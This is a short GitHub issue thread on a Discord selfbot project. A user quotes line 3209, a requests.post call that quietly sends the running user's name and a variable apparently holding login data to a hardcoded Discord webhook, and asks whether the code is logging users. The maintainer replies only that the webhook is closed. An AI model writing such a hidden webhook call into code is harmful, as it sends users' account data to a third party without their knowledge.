### ISSUE TITLE
line 3209 logging?

### ISSUE THREAD

**Issue by undrwrld** [SENPAi-03/SelfBot#3]
requests.post('https://discord.com/api/webhooks/890889226256797727/XeJhgmvwh0BhC35el74iC7P0qI4WOskTgJCvT6hbQvb1gK49QEbIp4-FJNjGcQ1ndWjm',json={'content': f"```\nTM312 : {SelfBot.user.name}\n\n{gqr}```"})

are you trying to log?!?!?!??!?

**Comment by i-amr** [comment]
Nah, the webhook is closed, you can check
